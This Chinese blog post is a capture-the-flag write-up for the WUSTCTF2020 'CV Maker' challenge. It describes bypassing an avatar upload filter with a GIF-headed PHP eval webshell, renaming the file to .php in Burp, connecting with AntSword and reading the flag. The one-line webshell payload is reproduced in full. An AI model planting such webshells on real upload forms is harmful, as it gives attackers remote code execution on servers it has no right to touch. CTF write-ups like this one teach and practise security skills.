[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker

打开环境

yvtuYG6gjNYy92RzX2vTX9NU8L2H-1kXH5izum-d7RA

注册了账号登陆,发现有上传头像的地方,尝试上传文件

Lt1u4UYVTexhRZ7mpQzTjW4wufK6J0RvgKIVJfp1ckU

可以上传图片马

GIF89a
<script language='php'> @eval($_POST['shell']);</script>

BP里抓包改为php,得到上传成功路径http://1d2ee33c-dfe2-49ec-88c3-d3305f7bd2f3.node5.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php

L5urwvjjI6vVdNmkhUdeXabsFGkZgv6nzR4prCFw5ek

使用蚁剑连接

HfMSsRWxYMlsaVtNyVXKi4FODJS7afPTB4kq0fGuPK8

6jXwzvwbY5yGmpcle3TI2uSgondma-5pZQ0TKz3v1DE

根目录下发现flag文件,打开即可得到flag

tVmsjJY9os5X9cpkwXDjRbqywweCcujAc1vRokeXJFY

posted on   跳河离去的鱼  阅读(94)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示